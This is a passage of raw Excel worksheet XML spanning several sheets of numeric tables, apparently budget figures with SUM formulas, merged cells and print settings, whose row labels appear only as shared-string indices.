    <row r="29" ht="21.95" customHeight="1" spans="1:3">
      <c r="A29" s="635" t="s">
        <v>2092</v>
      </c>
      <c r="B29" s="640" t="s">
        <v>2093</v>
      </c>
      <c r="C29" s="636">
        <v>15100</v>
      </c>
    </row>
    <row r="30" ht="21.95" customHeight="1" spans="1:3">
      <c r="A30" s="635" t="s">
        <v>2094</v>
      </c>
      <c r="B30" s="640" t="s">
        <v>2095</v>
      </c>
      <c r="C30" s="636">
        <v>800</v>
      </c>
    </row>
    <row r="31" ht="21.95" customHeight="1" spans="1:3">
      <c r="A31" s="635" t="s">
        <v>2096</v>
      </c>
      <c r="B31" s="640" t="s">
        <v>2097</v>
      </c>
      <c r="C31" s="636">
        <v>15289</v>
      </c>
    </row>
    <row r="32" ht="21.95" customHeight="1" spans="1:3">
      <c r="A32" s="635" t="s">
        <v>2098</v>
      </c>
      <c r="B32" s="640" t="s">
        <v>2099</v>
      </c>
      <c r="C32" s="636">
        <v>1500</v>
      </c>
    </row>
    <row r="33" ht="21.95" customHeight="1" spans="1:3">
      <c r="A33" s="641" t="s">
        <v>2100</v>
      </c>
      <c r="B33" s="635"/>
      <c r="C33" s="636">
        <v>198</v>
      </c>
    </row>
    <row r="34" ht="21.95" customHeight="1" spans="1:3">
      <c r="A34" s="641" t="s">
        <v>2101</v>
      </c>
      <c r="B34" s="635"/>
      <c r="C34" s="636">
        <v>408</v>
      </c>
    </row>
    <row r="35" ht="21.95" customHeight="1" spans="1:3">
      <c r="A35" s="635" t="s">
        <v>2102</v>
      </c>
      <c r="B35" s="640" t="s">
        <v>2103</v>
      </c>
      <c r="C35" s="636">
        <v>300</v>
      </c>
    </row>
    <row r="36" ht="21.95" customHeight="1" spans="1:3">
      <c r="A36" s="642" t="s">
        <v>2104</v>
      </c>
      <c r="B36" s="643" t="s">
        <v>2105</v>
      </c>
      <c r="C36" s="644">
        <v>3909</v>
      </c>
    </row>
  </sheetData>
  <mergeCells count="36">
    <mergeCell ref="A1:B1"/>
    <mergeCell ref="A2:C2"/>
    <mergeCell ref="A3:B3"/>
    <mergeCell ref="A4:B4"/>
    <mergeCell ref="A5:B5"/>
    <mergeCell ref="A6:B6"/>
    <mergeCell ref="A7:B7"/>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s>
  <printOptions horizontalCentered="1"/>
  <pageMargins left="0.751388888888889" right="0.751388888888889" top="0.66875" bottom="0.432638888888889" header="0.5" footer="0.5"/>
  <pageSetup paperSize="9" scale="98" orientation="portrait"/>
  <headerFooter/>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599993896298105"/>
  </sheetPr>
  <dimension ref="A1:B53"/>
  <sheetViews>
    <sheetView workbookViewId="0">
      <pane xSplit="1" ySplit="6" topLeftCell="B7" activePane="bottomRight" state="frozen"/>
      <selection/>
      <selection pane="topRight"/>
      <selection pane="bottomLeft"/>
      <selection pane="bottomRight" activeCell="B22" sqref="B22:B23"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultColWidth="10" defaultRowHeight="15.6" outlineLevelCol="1"/>
  <cols>
    <col min="1" max="1" width="53" style="184" customWidth="1"/>
    <col min="2" max="2" width="21.7222222222222" style="184" customWidth="1"/>
    <col min="3" max="16384" width="10" style="184"/>
  </cols>
  <sheetData>
    <row r="1" ht="18" customHeight="1" spans="1:2">
      <c r="A1" s="606" t="s">
        <v>2106</v>
      </c>
      <c r="B1" s="607"/>
    </row>
    <row r="2" ht="37" customHeight="1" spans="1:2">
      <c r="A2" s="608" t="s">
        <v>2107</v>
      </c>
      <c r="B2" s="608"/>
    </row>
    <row r="3" ht="25" customHeight="1" spans="1:2">
      <c r="A3" s="609"/>
      <c r="B3" s="610" t="s">
        <v>373</v>
      </c>
    </row>
    <row r="4" ht="33" customHeight="1" spans="1:2">
      <c r="A4" s="611" t="s">
        <v>2108</v>
      </c>
      <c r="B4" s="612" t="s">
        <v>829</v>
      </c>
    </row>
    <row r="5" ht="24" customHeight="1" spans="1:2">
      <c r="A5" s="613" t="s">
        <v>2109</v>
      </c>
      <c r="B5" s="614">
        <f>B6+B7+B8+B9+B11+B12+B13+B14+B15+B16+B17+B18+B19+B20+B21+B22+B23+B24+B25+B10</f>
        <v>29000</v>
      </c>
    </row>
    <row r="6" ht="18" customHeight="1" spans="1:2">
      <c r="A6" s="615" t="s">
        <v>2110</v>
      </c>
      <c r="B6" s="614">
        <v>160</v>
      </c>
    </row>
    <row r="7" ht="18" customHeight="1" spans="1:2">
      <c r="A7" s="616" t="s">
        <v>2111</v>
      </c>
      <c r="B7" s="617">
        <v>4</v>
      </c>
    </row>
    <row r="8" ht="18" customHeight="1" spans="1:2">
      <c r="A8" s="616" t="s">
        <v>2112</v>
      </c>
      <c r="B8" s="617">
        <v>362</v>
      </c>
    </row>
    <row r="9" ht="18" customHeight="1" spans="1:2">
      <c r="A9" s="616" t="s">
        <v>2113</v>
      </c>
      <c r="B9" s="617">
        <v>2200</v>
      </c>
    </row>
    <row r="10" ht="18" customHeight="1" spans="1:2">
      <c r="A10" s="616" t="s">
        <v>2114</v>
      </c>
      <c r="B10" s="617">
        <v>100</v>
      </c>
    </row>
    <row r="11" ht="18" customHeight="1" spans="1:2">
      <c r="A11" s="616" t="s">
        <v>2115</v>
      </c>
      <c r="B11" s="617">
        <v>25</v>
      </c>
    </row>
    <row r="12" ht="18" customHeight="1" spans="1:2">
      <c r="A12" s="616" t="s">
        <v>2116</v>
      </c>
      <c r="B12" s="617">
        <v>120</v>
      </c>
    </row>
    <row r="13" ht="18" customHeight="1" spans="1:2">
      <c r="A13" s="616" t="s">
        <v>2117</v>
      </c>
      <c r="B13" s="617">
        <v>152</v>
      </c>
    </row>
    <row r="14" ht="18" customHeight="1" spans="1:2">
      <c r="A14" s="616" t="s">
        <v>2118</v>
      </c>
      <c r="B14" s="617">
        <v>2100</v>
      </c>
    </row>
    <row r="15" ht="18" customHeight="1" spans="1:2">
      <c r="A15" s="616" t="s">
        <v>2119</v>
      </c>
      <c r="B15" s="617">
        <v>2700</v>
      </c>
    </row>
    <row r="16" ht="18" customHeight="1" spans="1:2">
      <c r="A16" s="616" t="s">
        <v>2120</v>
      </c>
      <c r="B16" s="617">
        <v>4000</v>
      </c>
    </row>
    <row r="17" ht="18" customHeight="1" spans="1:2">
      <c r="A17" s="618" t="s">
        <v>2121</v>
      </c>
      <c r="B17" s="619">
        <v>1000</v>
      </c>
    </row>
    <row r="18" ht="18" customHeight="1" spans="1:2">
      <c r="A18" s="616" t="s">
        <v>2122</v>
      </c>
      <c r="B18" s="617">
        <v>5000</v>
      </c>
    </row>
    <row r="19" ht="18" customHeight="1" spans="1:2">
      <c r="A19" s="618" t="s">
        <v>2123</v>
      </c>
      <c r="B19" s="617">
        <v>345</v>
      </c>
    </row>
    <row r="20" ht="18" customHeight="1" spans="1:2">
      <c r="A20" s="618" t="s">
        <v>2124</v>
      </c>
      <c r="B20" s="619">
        <v>71</v>
      </c>
    </row>
    <row r="21" ht="18" customHeight="1" spans="1:2">
      <c r="A21" s="618" t="s">
        <v>2125</v>
      </c>
      <c r="B21" s="619">
        <v>349</v>
      </c>
    </row>
    <row r="22" ht="18" customHeight="1" spans="1:2">
      <c r="A22" s="618" t="s">
        <v>2126</v>
      </c>
      <c r="B22" s="619"/>
    </row>
    <row r="23" ht="18" customHeight="1" spans="1:2">
      <c r="A23" s="618" t="s">
        <v>2127</v>
      </c>
      <c r="B23" s="620"/>
    </row>
    <row r="24" ht="18" customHeight="1" spans="1:2">
      <c r="A24" s="618" t="s">
        <v>2128</v>
      </c>
      <c r="B24" s="617">
        <v>108</v>
      </c>
    </row>
    <row r="25" ht="18" customHeight="1" spans="1:2">
      <c r="A25" s="621" t="s">
        <v>2129</v>
      </c>
      <c r="B25" s="622">
        <v>10204</v>
      </c>
    </row>
    <row r="26" spans="2:2">
      <c r="B26" s="623"/>
    </row>
    <row r="27" spans="2:2">
      <c r="B27" s="623"/>
    </row>
    <row r="28" spans="2:2">
      <c r="B28" s="623"/>
    </row>
    <row r="29" spans="2:2">
      <c r="B29" s="623"/>
    </row>
    <row r="30" spans="2:2">
      <c r="B30" s="623"/>
    </row>
    <row r="31" spans="2:2">
      <c r="B31" s="623"/>
    </row>
    <row r="32" spans="2:2">
      <c r="B32" s="623"/>
    </row>
    <row r="33" spans="2:2">
      <c r="B33" s="623"/>
    </row>
    <row r="34" spans="2:2">
      <c r="B34" s="623"/>
    </row>
    <row r="35" spans="2:2">
      <c r="B35" s="623"/>
    </row>
    <row r="36" spans="2:2">
      <c r="B36" s="623"/>
    </row>
    <row r="37" spans="2:2">
      <c r="B37" s="623"/>
    </row>
    <row r="38" spans="2:2">
      <c r="B38" s="623"/>
    </row>
    <row r="39" spans="2:2">
      <c r="B39" s="623"/>
    </row>
    <row r="40" spans="2:2">
      <c r="B40" s="623"/>
    </row>
    <row r="41" spans="2:2">
      <c r="B41" s="623"/>
    </row>
    <row r="42" spans="2:2">
      <c r="B42" s="623"/>
    </row>
    <row r="43" spans="2:2">
      <c r="B43" s="623"/>
    </row>
    <row r="44" spans="2:2">
      <c r="B44" s="623"/>
    </row>
    <row r="45" spans="2:2">
      <c r="B45" s="623"/>
    </row>
    <row r="46" spans="2:2">
      <c r="B46" s="623"/>
    </row>
    <row r="47" spans="2:2">
      <c r="B47" s="623"/>
    </row>
    <row r="48" spans="2:2">
      <c r="B48" s="623"/>
    </row>
    <row r="49" spans="2:2">
      <c r="B49" s="623"/>
    </row>
    <row r="50" spans="2:2">
      <c r="B50" s="623"/>
    </row>
    <row r="51" spans="2:2">
      <c r="B51" s="623"/>
    </row>
    <row r="52" spans="2:2">
      <c r="B52" s="623"/>
    </row>
    <row r="53" spans="2:2">
      <c r="B53" s="623"/>
    </row>
  </sheetData>
  <mergeCells count="1">
    <mergeCell ref="A2:B2"/>
  </mergeCells>
  <printOptions horizontalCentered="1"/>
  <pageMargins left="0.751388888888889" right="0.751388888888889" top="1" bottom="1" header="0.511805555555556" footer="0.511805555555556"/>
  <pageSetup paperSize="9" orientation="portrait" horizontalDpi="600"/>
  <headerFooter/>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6"/>
  </sheetPr>
  <dimension ref="A1:D34"/>
  <sheetViews>
    <sheetView workbookViewId="0">
      <pane xSplit="2" ySplit="5" topLeftCell="C6" activePane="bottomRight" state="frozen"/>
      <selection/>
      <selection pane="topRight"/>
      <selection pane="bottomLeft"/>
      <selection pane="bottomRight" activeCell="C6" sqref="C6:C15"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultColWidth="10" defaultRowHeight="15.6" outlineLevelCol="3"/>
  <cols>
    <col min="1" max="4" width="21.2777777777778" style="184" customWidth="1"/>
    <col min="5" max="16384" width="10" style="184"/>
  </cols>
  <sheetData>
    <row r="1" ht="21" customHeight="1" spans="1:4">
      <c r="A1" s="394" t="s">
        <v>2130</v>
      </c>
      <c r="B1" s="588"/>
      <c r="C1" s="589"/>
      <c r="D1" s="589"/>
    </row>
    <row r="2" ht="51.95" customHeight="1" spans="1:4">
      <c r="A2" s="523" t="s">
        <v>2131</v>
      </c>
      <c r="B2" s="523"/>
      <c r="C2" s="523"/>
      <c r="D2" s="523"/>
    </row>
    <row r="3" ht="19.15" customHeight="1" spans="1:4">
      <c r="A3" s="590"/>
      <c r="B3" s="591"/>
      <c r="C3" s="592"/>
      <c r="D3" s="592" t="s">
        <v>373</v>
      </c>
    </row>
    <row r="4" ht="24.4" customHeight="1" spans="1:4">
      <c r="A4" s="580" t="s">
        <v>2132</v>
      </c>
      <c r="B4" s="580" t="s">
        <v>829</v>
      </c>
      <c r="C4" s="580"/>
      <c r="D4" s="580"/>
    </row>
    <row r="5" ht="24.4" customHeight="1" spans="1:4">
      <c r="A5" s="593"/>
      <c r="B5" s="593" t="s">
        <v>2133</v>
      </c>
      <c r="C5" s="594" t="s">
        <v>511</v>
      </c>
      <c r="D5" s="594" t="s">
        <v>2134</v>
      </c>
    </row>
    <row r="6" ht="30" customHeight="1" spans="1:4">
      <c r="A6" s="481" t="s">
        <v>705</v>
      </c>
      <c r="B6" s="595"/>
      <c r="C6" s="596">
        <v>662</v>
      </c>
      <c r="D6" s="597">
        <v>1261</v>
      </c>
    </row>
    <row r="7" ht="30" customHeight="1" spans="1:4">
      <c r="A7" s="484" t="s">
        <v>706</v>
      </c>
      <c r="B7" s="598"/>
      <c r="C7" s="599">
        <v>1653</v>
      </c>
      <c r="D7" s="600">
        <v>722</v>
      </c>
    </row>
    <row r="8" ht="30" customHeight="1" spans="1:4">
      <c r="A8" s="484" t="s">
        <v>707</v>
      </c>
      <c r="B8" s="598"/>
      <c r="C8" s="599">
        <v>602</v>
      </c>
      <c r="D8" s="600">
        <v>669</v>
      </c>
    </row>
    <row r="9" ht="30" customHeight="1" spans="1:4">
      <c r="A9" s="484" t="s">
        <v>708</v>
      </c>
      <c r="B9" s="598"/>
      <c r="C9" s="599">
        <v>772</v>
      </c>
      <c r="D9" s="600">
        <v>697</v>
      </c>
    </row>
    <row r="10" ht="30" customHeight="1" spans="1:4">
      <c r="A10" s="484" t="s">
        <v>709</v>
      </c>
      <c r="B10" s="598"/>
      <c r="C10" s="599">
        <v>1315</v>
      </c>
      <c r="D10" s="600">
        <v>1030</v>
      </c>
    </row>
    <row r="11" ht="30" customHeight="1" spans="1:4">
      <c r="A11" s="484" t="s">
        <v>710</v>
      </c>
      <c r="B11" s="598"/>
      <c r="C11" s="599">
        <v>500</v>
      </c>
      <c r="D11" s="600">
        <v>460</v>
      </c>
    </row>
    <row r="12" ht="30" customHeight="1" spans="1:4">
      <c r="A12" s="484" t="s">
        <v>711</v>
      </c>
      <c r="B12" s="598"/>
      <c r="C12" s="599">
        <v>988</v>
      </c>
      <c r="D12" s="600">
        <v>557</v>
      </c>
    </row>
    <row r="13" ht="30" customHeight="1" spans="1:4">
      <c r="A13" s="484" t="s">
        <v>712</v>
      </c>
      <c r="B13" s="598"/>
      <c r="C13" s="599">
        <v>1231</v>
      </c>
      <c r="D13" s="600">
        <v>310</v>
      </c>
    </row>
    <row r="14" ht="30" customHeight="1" spans="1:4">
      <c r="A14" s="484" t="s">
        <v>713</v>
      </c>
      <c r="B14" s="598"/>
      <c r="C14" s="599">
        <v>1032</v>
      </c>
      <c r="D14" s="600">
        <v>392</v>
      </c>
    </row>
    <row r="15" ht="30" customHeight="1" spans="1:4">
      <c r="A15" s="484" t="s">
        <v>714</v>
      </c>
      <c r="B15" s="598"/>
      <c r="C15" s="599">
        <v>278</v>
      </c>
      <c r="D15" s="600">
        <v>195</v>
      </c>
    </row>
    <row r="16" ht="30" customHeight="1" spans="1:4">
      <c r="A16" s="484" t="s">
        <v>2135</v>
      </c>
      <c r="B16" s="598"/>
      <c r="C16" s="599"/>
      <c r="D16" s="600"/>
    </row>
    <row r="17" ht="30" customHeight="1" spans="1:4">
      <c r="A17" s="601" t="s">
        <v>813</v>
      </c>
      <c r="B17" s="602">
        <f>SUM(C17:D17)</f>
        <v>15326</v>
      </c>
      <c r="C17" s="603">
        <f>SUM(C6:C15)</f>
        <v>9033</v>
      </c>
      <c r="D17" s="604">
        <f>SUM(D6:D15)</f>
        <v>6293</v>
      </c>
    </row>
    <row r="18" spans="3:4">
      <c r="C18" s="605"/>
      <c r="D18" s="605"/>
    </row>
    <row r="19" spans="3:4">
      <c r="C19" s="589"/>
      <c r="D19" s="589"/>
    </row>
    <row r="20" spans="3:4">
      <c r="C20" s="589"/>
      <c r="D20" s="589"/>
    </row>
    <row r="21" spans="3:4">
      <c r="C21" s="589"/>
      <c r="D21" s="589"/>
    </row>
    <row r="22" spans="3:4">
      <c r="C22" s="589"/>
      <c r="D22" s="589"/>
    </row>
    <row r="23" spans="3:4">
      <c r="C23" s="589"/>
      <c r="D23" s="589"/>
    </row>
    <row r="24" spans="3:4">
      <c r="C24" s="589"/>
      <c r="D24" s="589"/>
    </row>
    <row r="25" spans="3:4">
      <c r="C25" s="589"/>
      <c r="D25" s="589"/>
    </row>
    <row r="26" spans="3:4">
      <c r="C26" s="589"/>
      <c r="D26" s="589"/>
    </row>
    <row r="27" spans="3:4">
      <c r="C27" s="589"/>
      <c r="D27" s="589"/>
    </row>
    <row r="28" spans="3:4">
      <c r="C28" s="589"/>
      <c r="D28" s="589"/>
    </row>
    <row r="29" spans="3:4">
      <c r="C29" s="589"/>
      <c r="D29" s="589"/>
    </row>
    <row r="30" spans="3:4">
      <c r="C30" s="589"/>
      <c r="D30" s="589"/>
    </row>
    <row r="31" spans="3:4">
      <c r="C31" s="589"/>
      <c r="D31" s="589"/>
    </row>
    <row r="32" spans="3:4">
      <c r="C32" s="589"/>
      <c r="D32" s="589"/>
    </row>
    <row r="33" spans="3:4">
      <c r="C33" s="589"/>
      <c r="D33" s="589"/>
    </row>
    <row r="34" spans="3:4">
      <c r="C34" s="589"/>
      <c r="D34" s="589"/>
    </row>
  </sheetData>
  <mergeCells count="3">
    <mergeCell ref="A2:D2"/>
    <mergeCell ref="B4:D4"/>
    <mergeCell ref="A4:A5"/>
  </mergeCells>
  <printOptions horizontalCentered="1"/>
  <pageMargins left="0.75" right="0.75" top="1" bottom="1" header="0.51" footer="0.51"/>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599993896298105"/>
  </sheetPr>
  <dimension ref="A1:A7"/>
  <sheetViews>
    <sheetView workbookViewId="0">
      <selection activeCell="A3" sqref="A3"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultColWidth="9.14814814814815" defaultRowHeight="13.2" outlineLevelRow="6"/>
  <cols>
    <col min="1" max="1" width="89.7222222222222" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="1" ht="57" customHeight="1"/>
    <row r="2" ht="57" customHeight="1"/>
    <row r="3" ht="148.8" spans="1:1">
      <c r="A3" s="78" t="s">
        <v>371</v>
      </c>
    </row>
    <row r="4" ht="57" customHeight="1"/>
    <row r="5" ht="57" customHeight="1"/>
    <row r="6" ht="57" customHeight="1"/>
    <row r="7" ht="57" customHeight="1"/>
  </sheetData>
  <pageMargins left="0.75" right="0.75" top="1" bottom="1" header="0.5" footer="0.5"/>
  <pageSetup paperSize="9" orientation="portrait"/>
  <headerFooter/>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6"/>
    <pageSetUpPr fitToPage="1"/>
  </sheetPr>
  <dimension ref="A1:G27"/>
  <sheetViews>
    <sheetView workbookViewId="0">
      <selection activeCell="A2" sqref="A2:G2"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultColWidth="10" defaultRowHeight="15.6" outlineLevelCol="6"/>
  <cols>
    <col min="1" max="2" width="12.7222222222222" style="184" customWidth="1"/>
    <col min="3" max="7" width="11.7222222222222" style="184" customWidth="1"/>
    <col min="8" max="8" width="9.55555555555556" style="184" customWidth="1"/>
    <col min="9" max="16311" width="10" style="184"/>
  </cols>
  <sheetData>
    <row r="1" s="184" customFormat="1" ht="18" customHeight="1" spans="1:5">
      <c r="A1" s="489" t="s">
        <v>2136</v>
      </c>
      <c r="B1" s="490"/>
      <c r="C1" s="490"/>
      <c r="D1" s="490"/>
      <c r="E1" s="490"/>
    </row>
    <row r="2" s="184" customFormat="1" ht="39" customHeight="1" spans="1:7">
      <c r="A2" s="448" t="s">
        <v>2137</v>
      </c>
      <c r="B2" s="448"/>
      <c r="C2" s="448"/>
      <c r="D2" s="448"/>
      <c r="E2" s="448"/>
      <c r="F2" s="448"/>
      <c r="G2" s="448"/>
    </row>
    <row r="3" s="184" customFormat="1" ht="18.4" customHeight="1" spans="1:7">
      <c r="A3" s="494"/>
      <c r="B3" s="494"/>
      <c r="D3" s="496"/>
      <c r="E3" s="496"/>
      <c r="G3" s="579" t="s">
        <v>373</v>
      </c>
    </row>
    <row r="4" s="184" customFormat="1" ht="36.95" customHeight="1" spans="1:7">
      <c r="A4" s="580" t="s">
        <v>2132</v>
      </c>
      <c r="B4" s="580" t="s">
        <v>704</v>
      </c>
      <c r="C4" s="580" t="s">
        <v>511</v>
      </c>
      <c r="D4" s="580"/>
      <c r="E4" s="580" t="s">
        <v>2134</v>
      </c>
      <c r="F4" s="580"/>
      <c r="G4" s="580"/>
    </row>
    <row r="5" s="184" customFormat="1" ht="47.1" customHeight="1" spans="1:7">
      <c r="A5" s="580"/>
      <c r="B5" s="580"/>
      <c r="C5" s="580" t="s">
        <v>2138</v>
      </c>
      <c r="D5" s="580" t="s">
        <v>2139</v>
      </c>
      <c r="E5" s="580" t="s">
        <v>492</v>
      </c>
      <c r="F5" s="580" t="s">
        <v>2140</v>
      </c>
      <c r="G5" s="580" t="s">
        <v>2141</v>
      </c>
    </row>
    <row r="6" s="316" customFormat="1" ht="39.95" customHeight="1" spans="1:7">
      <c r="A6" s="484" t="s">
        <v>705</v>
      </c>
      <c r="B6" s="482">
        <f t="shared" ref="B6:B17" si="0">SUM(C6:G6)</f>
        <v>1922</v>
      </c>
      <c r="C6" s="581">
        <v>313</v>
      </c>
      <c r="D6" s="581">
        <v>349</v>
      </c>
      <c r="E6" s="581"/>
      <c r="F6" s="581">
        <v>70</v>
      </c>
      <c r="G6" s="581">
        <v>1190</v>
      </c>
    </row>
    <row r="7" s="316" customFormat="1" ht="39.95" customHeight="1" spans="1:7">
      <c r="A7" s="484" t="s">
        <v>706</v>
      </c>
      <c r="B7" s="485">
        <f t="shared" si="0"/>
        <v>2375</v>
      </c>
      <c r="C7" s="581">
        <v>294</v>
      </c>
      <c r="D7" s="581">
        <v>1359</v>
      </c>
      <c r="E7" s="581"/>
      <c r="F7" s="581">
        <v>100</v>
      </c>
      <c r="G7" s="581">
        <v>622</v>
      </c>
    </row>
    <row r="8" s="316" customFormat="1" ht="39.95" customHeight="1" spans="1:7">
      <c r="A8" s="484" t="s">
        <v>707</v>
      </c>
      <c r="B8" s="485">
        <f t="shared" si="0"/>
        <v>1271</v>
      </c>
      <c r="C8" s="581"/>
      <c r="D8" s="581">
        <v>602</v>
      </c>
      <c r="E8" s="581"/>
      <c r="F8" s="581">
        <v>108</v>
      </c>
      <c r="G8" s="581">
        <v>561</v>
      </c>
    </row>
    <row r="9" s="316" customFormat="1" ht="39.95" customHeight="1" spans="1:7">
      <c r="A9" s="484" t="s">
        <v>708</v>
      </c>
      <c r="B9" s="485">
        <f t="shared" si="0"/>
        <v>1469</v>
      </c>
      <c r="C9" s="581"/>
      <c r="D9" s="581">
        <v>772</v>
      </c>
      <c r="E9" s="581"/>
      <c r="F9" s="581">
        <v>74</v>
      </c>
      <c r="G9" s="581">
        <v>623</v>
      </c>
    </row>
    <row r="10" s="316" customFormat="1" ht="39.95" customHeight="1" spans="1:7">
      <c r="A10" s="484" t="s">
        <v>709</v>
      </c>
      <c r="B10" s="485">
        <f t="shared" si="0"/>
        <v>2344</v>
      </c>
      <c r="C10" s="581">
        <v>648</v>
      </c>
      <c r="D10" s="581">
        <v>667</v>
      </c>
      <c r="E10" s="581"/>
      <c r="F10" s="581">
        <v>58</v>
      </c>
      <c r="G10" s="581">
        <v>971</v>
      </c>
    </row>
    <row r="11" s="316" customFormat="1" ht="39.95" customHeight="1" spans="1:7">
      <c r="A11" s="484" t="s">
        <v>710</v>
      </c>
      <c r="B11" s="485">
        <f t="shared" si="0"/>
        <v>960</v>
      </c>
      <c r="C11" s="581">
        <v>186</v>
      </c>
      <c r="D11" s="581">
        <v>314</v>
      </c>
      <c r="E11" s="581"/>
      <c r="F11" s="581">
        <v>74</v>
      </c>
      <c r="G11" s="581">
        <v>386</v>
      </c>
    </row>
    <row r="12" s="316" customFormat="1" ht="39.95" customHeight="1" spans="1:7">
      <c r="A12" s="484" t="s">
        <v>711</v>
      </c>
      <c r="B12" s="485">
        <f t="shared" si="0"/>
        <v>1546</v>
      </c>
      <c r="C12" s="581">
        <v>483</v>
      </c>
      <c r="D12" s="581">
        <v>505</v>
      </c>
      <c r="E12" s="581"/>
      <c r="F12" s="581">
        <v>72</v>
      </c>
      <c r="G12" s="581">
        <v>486</v>
      </c>
    </row>
    <row r="13" s="316" customFormat="1" ht="39.95" customHeight="1" spans="1:7">
      <c r="A13" s="484" t="s">
        <v>712</v>
      </c>
      <c r="B13" s="485">
        <f t="shared" si="0"/>
        <v>1542</v>
      </c>
      <c r="C13" s="581">
        <v>862</v>
      </c>
      <c r="D13" s="581">
        <v>369</v>
      </c>
      <c r="E13" s="581"/>
      <c r="F13" s="581">
        <v>55</v>
      </c>
      <c r="G13" s="581">
        <v>256</v>
      </c>
    </row>
    <row r="14" s="316" customFormat="1" ht="39.95" customHeight="1" spans="1:7">
      <c r="A14" s="484" t="s">
        <v>713</v>
      </c>
      <c r="B14" s="485">
        <f t="shared" si="0"/>
        <v>1424</v>
      </c>
      <c r="C14" s="581">
        <v>437</v>
      </c>
      <c r="D14" s="581">
        <v>595</v>
      </c>
      <c r="E14" s="581"/>
      <c r="F14" s="581">
        <v>65</v>
      </c>
      <c r="G14" s="581">
        <v>327</v>
      </c>
    </row>
    <row r="15" s="316" customFormat="1" ht="39.95" customHeight="1" spans="1:7">
      <c r="A15" s="484" t="s">
        <v>714</v>
      </c>
      <c r="B15" s="485">
        <f t="shared" si="0"/>
        <v>473</v>
      </c>
      <c r="C15" s="581"/>
      <c r="D15" s="581">
        <v>278</v>
      </c>
      <c r="E15" s="581"/>
      <c r="F15" s="581">
        <v>62</v>
      </c>
      <c r="G15" s="581">
        <v>133</v>
      </c>
    </row>
    <row r="16" s="316" customFormat="1" ht="39.95" customHeight="1" spans="1:7">
      <c r="A16" s="582" t="s">
        <v>2135</v>
      </c>
      <c r="B16" s="488"/>
      <c r="C16" s="583"/>
      <c r="D16" s="584"/>
      <c r="E16" s="584"/>
      <c r="F16" s="584"/>
      <c r="G16" s="584"/>
    </row>
    <row r="17" s="316" customFormat="1" ht="39.95" customHeight="1" spans="1:7">
      <c r="A17" s="487" t="s">
        <v>813</v>
      </c>
      <c r="B17" s="585">
        <f t="shared" si="0"/>
        <v>15326</v>
      </c>
      <c r="C17" s="586">
        <f t="shared" ref="C17:G17" si="1">SUM(C6:C16)</f>
        <v>3223</v>
      </c>
      <c r="D17" s="586">
        <f t="shared" si="1"/>
        <v>5810</v>
      </c>
      <c r="E17" s="586">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="F17" s="587">
        <f t="shared" si="1"/>
        <v>738</v>
      </c>
      <c r="G17" s="586">
        <f t="shared" si="1"/>
        <v>5555</v>
      </c>
    </row>
    <row r="18" s="184" customFormat="1" spans="3:3">
      <c r="C18" s="508"/>
    </row>
    <row r="19" s="184" customFormat="1" spans="3:3">
      <c r="C19" s="508"/>
    </row>
    <row r="20" s="184" customFormat="1"/>
    <row r="21" s="184" customFormat="1" spans="3:3">
      <c r="C21" s="508"/>
    </row>
    <row r="22" s="184" customFormat="1" spans="3:3">
      <c r="C22" s="508"/>
    </row>
    <row r="23" s="184" customFormat="1" spans="3:3">
      <c r="C23" s="508"/>
    </row>
    <row r="24" s="184" customFormat="1" spans="3:3">
      <c r="C24" s="508"/>
    </row>
    <row r="25" s="184" customFormat="1" spans="3:3">
      <c r="C25" s="508"/>
    </row>
    <row r="26" s="184" customFormat="1" spans="3:3">
      <c r="C26" s="508"/>
    </row>
    <row r="27" s="184" customFormat="1" spans="3:3">
      <c r="C27" s="508"/>
    </row>
  </sheetData>
  <mergeCells count="5">
    <mergeCell ref="A2:G2"/>
    <mergeCell ref="C4:D4"/>
    <mergeCell ref="E4:G4"/>
    <mergeCell ref="A4:A5"/>
    <mergeCell ref="B4:B5"/>
  </mergeCells>
  <pageMargins left="0.75" right="0.75" top="1" bottom="1" header="0.5" footer="0.5"/>
  <pageSetup paperSize="9" fitToHeight="0" orientation="portrait"/>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599993896298105"/>
    <pageSetUpPr fitToPage="1"/>
  </sheetPr>
  <dimension ref="A1:F23"/>
  <sheetViews>
    <sheetView workbookViewId="0">
      <pane xSplit="1" ySplit="5" topLeftCell="B9" activePane="bottomRight" state="frozen"/>
      <selection/>
      <selection pane="topRight"/>
      <selection pane="bottomLeft"/>
      <selection pane="bottomRight" activeCell="E11" sqref="E11"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultColWidth="9.84259259259259" defaultRowHeight="15.6" outlineLevelCol="5"/>
  <cols>
    <col min="1" max="1" width="49.7222222222222" style="552" customWidth="1"/>
    <col min="2" max="2" width="17.2777777777778" style="553" customWidth="1"/>
    <col min="3" max="3" width="15.5740740740741" style="553" customWidth="1"/>
    <col min="4" max="4" width="16.4259259259259" style="554" customWidth="1"/>
    <col min="5" max="5" width="6.27777777777778" style="552" customWidth="1"/>
    <col min="6" max="6" width="9.84259259259259" style="552" customWidth="1"/>
    <col min="7" max="7" width="9.84259259259259" style="552"/>
    <col min="8" max="8" width="23" style="552" customWidth="1"/>
    <col min="9" max="16384" width="9.84259259259259" style="552"/>
  </cols>
  <sheetData>
    <row r="1" s="548" customFormat="1" ht="17.25" customHeight="1" spans="1:4">
      <c r="A1" s="555" t="s">
        <v>2142</v>
      </c>
      <c r="B1" s="556"/>
      <c r="C1" s="556"/>
      <c r="D1" s="557"/>
    </row>
    <row r="2" s="549" customFormat="1" ht="34.5" customHeight="1" spans="1:4">
      <c r="A2" s="523" t="s">
        <v>2143</v>
      </c>
      <c r="B2" s="523"/>
      <c r="C2" s="523"/>
      <c r="D2" s="523"/>
    </row>
    <row r="3" s="515" customFormat="1" ht="24" customHeight="1" spans="1:4">
      <c r="A3" s="558"/>
      <c r="B3" s="558"/>
      <c r="C3" s="558"/>
      <c r="D3" s="559" t="s">
        <v>373</v>
      </c>
    </row>
    <row r="4" s="550" customFormat="1" ht="42.95" customHeight="1" spans="1:4">
      <c r="A4" s="560" t="s">
        <v>828</v>
      </c>
      <c r="B4" s="361" t="s">
        <v>519</v>
      </c>
      <c r="C4" s="560" t="s">
        <v>829</v>
      </c>
      <c r="D4" s="561" t="s">
        <v>619</v>
      </c>
    </row>
    <row r="5" s="551" customFormat="1" ht="27.95" customHeight="1" spans="1:4">
